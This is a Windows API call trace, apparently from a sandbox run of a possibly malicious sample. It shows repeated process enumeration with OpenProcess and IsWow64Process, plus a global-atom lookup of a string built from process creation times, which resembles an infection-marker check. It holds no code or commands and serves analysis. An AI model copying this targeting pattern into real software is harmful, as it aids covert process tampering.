	[0103.700] CloseHandle (hObject=0x694) returned 1
	[0103.700] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0103.700] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0103.700] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.700] CloseHandle (hObject=0x694) returned 1
	[0103.700] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0103.701] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.701] CloseHandle (hObject=0x694) returned 1
	[0103.701] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0103.701] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.701] CloseHandle (hObject=0x694) returned 1
	[0103.701] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0103.701] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.701] CloseHandle (hObject=0x694) returned 1
	[0103.701] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0103.701] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.701] CloseHandle (hObject=0x694) returned 1
	[0103.701] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0103.701] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.701] CloseHandle (hObject=0x694) returned 1
	[0103.702] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0103.702] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.702] CloseHandle (hObject=0x694) returned 1
	[0103.702] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0103.702] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.702] CloseHandle (hObject=0x694) returned 1
	[0103.702] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0103.702] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.702] CloseHandle (hObject=0x694) returned 1
	[0103.702] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0103.703] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.703] CloseHandle (hObject=0x694) returned 1
	[0103.703] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0103.703] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.703] CloseHandle (hObject=0x694) returned 1
	[0103.703] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0103.703] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.703] CloseHandle (hObject=0x694) returned 1
	[0103.703] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0103.703] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.703] CloseHandle (hObject=0x694) returned 1
	[0103.704] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0103.704] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.704] CloseHandle (hObject=0x694) returned 1
	[0103.704] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0103.704] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.704] CloseHandle (hObject=0x694) returned 1
	[0103.704] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0103.704] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.704] CloseHandle (hObject=0x694) returned 1
	[0103.704] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0103.704] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.704] CloseHandle (hObject=0x694) returned 1
	[0103.704] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0103.704] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.704] CloseHandle (hObject=0x694) returned 1
	[0103.705] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0103.705] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.705] CloseHandle (hObject=0x694) returned 1
	[0103.705] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0103.705] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.705] CloseHandle (hObject=0x694) returned 1
	[0103.705] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0103.705] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.705] CloseHandle (hObject=0x694) returned 1
	[0103.705] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0103.705] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.705] CloseHandle (hObject=0x694) returned 1
	[0103.705] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0103.705] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.705] CloseHandle (hObject=0x694) returned 1
	[0103.706] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0103.706] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0103.706] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0103.706] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0103.706] wsprintfA (in: param_1=0x3993a10, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0103.707] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0103.707] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0103.707] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0103.707] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0103.707] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0103.707] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0103.707] CloseHandle (hObject=0x694) returned 1
	[0103.707] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0103.708] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0103.708] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.708] CloseHandle (hObject=0x694) returned 1
	[0103.708] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0103.708] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.708] CloseHandle (hObject=0x694) returned 1
	[0103.740] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0103.740] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0103.740] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0103.740] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0103.741] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0103.741] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0103.741] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0103.741] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0103.741] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0103.741] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0103.741] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0103.742] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0103.742] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0103.742] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0103.742] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0103.742] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0103.742] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0103.742] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0103.743] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0103.743] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.743] CloseHandle (hObject=0x694) returned 1
	[0103.743] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0103.743] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0103.743] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0103.744] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.744] CloseHandle (hObject=0x694) returned 1
	[0103.744] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0103.744] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0103.744] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.744] CloseHandle (hObject=0x694) returned 1
	[0103.744] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0103.744] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.744] CloseHandle (hObject=0x694) returned 1
	[0103.744] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0103.744] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.744] CloseHandle (hObject=0x694) returned 1
	[0103.744] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0103.744] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.745] CloseHandle (hObject=0x694) returned 1
	[0103.745] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0103.745] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.745] CloseHandle (hObject=0x694) returned 1
	[0103.745] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0103.745] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.745] CloseHandle (hObject=0x694) returned 1
	[0103.745] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0103.745] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0103.745] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.745] CloseHandle (hObject=0x694) returned 1
	[0103.745] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0103.745] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.745] CloseHandle (hObject=0x694) returned 1
	[0103.746] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0103.746] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.746] CloseHandle (hObject=0x694) returned 1
	[0103.746] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0103.746] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.746] CloseHandle (hObject=0x694) returned 1
	[0103.746] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0103.746] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.746] CloseHandle (hObject=0x694) returned 1
	[0103.746] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0103.746] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.746] CloseHandle (hObject=0x694) returned 1
	[0103.746] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0103.746] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.747] CloseHandle (hObject=0x694) returned 1
	[0103.747] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0103.747] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.747] CloseHandle (hObject=0x694) returned 1
	[0103.747] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0103.747] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.747] CloseHandle (hObject=0x694) returned 1
	[0103.747] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0103.747] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.747] CloseHandle (hObject=0x694) returned 1
	[0103.747] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0103.747] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.747] CloseHandle (hObject=0x694) returned 1
	[0103.747] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0103.747] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.748] CloseHandle (hObject=0x694) returned 1
	[0103.748] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0103.748] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.748] CloseHandle (hObject=0x694) returned 1
	[0103.748] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0103.748] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.748] CloseHandle (hObject=0x694) returned 1
	[0103.748] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0103.748] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.748] CloseHandle (hObject=0x694) returned 1
	[0103.748] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0103.748] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.748] CloseHandle (hObject=0x694) returned 1
	[0103.749] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0103.749] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.749] CloseHandle (hObject=0x694) returned 1
	[0103.749] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0103.749] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.749] CloseHandle (hObject=0x694) returned 1
	[0103.749] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0103.749] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.749] CloseHandle (hObject=0x694) returned 1
	[0103.749] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0103.749] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.749] CloseHandle (hObject=0x694) returned 1
	[0103.749] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0103.749] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.749] CloseHandle (hObject=0x694) returned 1
	[0103.750] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0103.750] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.750] CloseHandle (hObject=0x694) returned 1
	[0103.750] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0103.750] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.750] CloseHandle (hObject=0x694) returned 1
	[0103.750] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0103.750] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0103.750] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0103.751] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0103.751] wsprintfA (in: param_1=0x39936c8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0103.751] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0103.751] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0103.751] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0103.751] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0103.752] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0103.752] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0103.752] CloseHandle (hObject=0x694) returned 1
	[0103.752] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0103.752] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0103.752] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.752] CloseHandle (hObject=0x694) returned 1
	[0103.752] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0103.752] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.752] CloseHandle (hObject=0x694) returned 1
	[0103.786] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0103.786] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0103.786] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0103.786] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0103.786] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0103.787] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0103.787] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0103.787] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0103.787] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0103.787] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0103.787] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0103.787] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0103.788] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0103.788] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0103.788] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0103.788] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0103.788] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0103.788] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0103.788] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0103.788] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.789] CloseHandle (hObject=0x694) returned 1
	[0103.789] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0103.789] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0103.789] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0103.789] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.789] CloseHandle (hObject=0x694) returned 1
	[0103.789] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0103.789] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0103.789] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.789] CloseHandle (hObject=0x694) returned 1
	[0103.790] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0103.790] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.790] CloseHandle (hObject=0x694) returned 1
	[0103.790] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0103.790] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.790] CloseHandle (hObject=0x694) returned 1
	[0103.790] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0103.790] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.790] CloseHandle (hObject=0x694) returned 1
	[0103.790] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0103.790] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.790] CloseHandle (hObject=0x694) returned 1
	[0103.790] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0103.790] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.790] CloseHandle (hObject=0x694) returned 1
	[0103.791] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0103.791] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0103.791] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.791] CloseHandle (hObject=0x694) returned 1
	[0103.791] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0103.791] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.791] CloseHandle (hObject=0x694) returned 1
	[0103.791] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0103.791] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.791] CloseHandle (hObject=0x694) returned 1
	[0103.791] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0103.791] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.791] CloseHandle (hObject=0x694) returned 1
	[0103.791] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0103.791] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.791] CloseHandle (hObject=0x694) returned 1
	[0103.792] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0103.792] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.792] CloseHandle (hObject=0x694) returned 1
	[0103.792] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0103.792] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.792] CloseHandle (hObject=0x694) returned 1
	[0103.792] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0103.792] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.792] CloseHandle (hObject=0x694) returned 1
	[0103.792] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0103.792] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
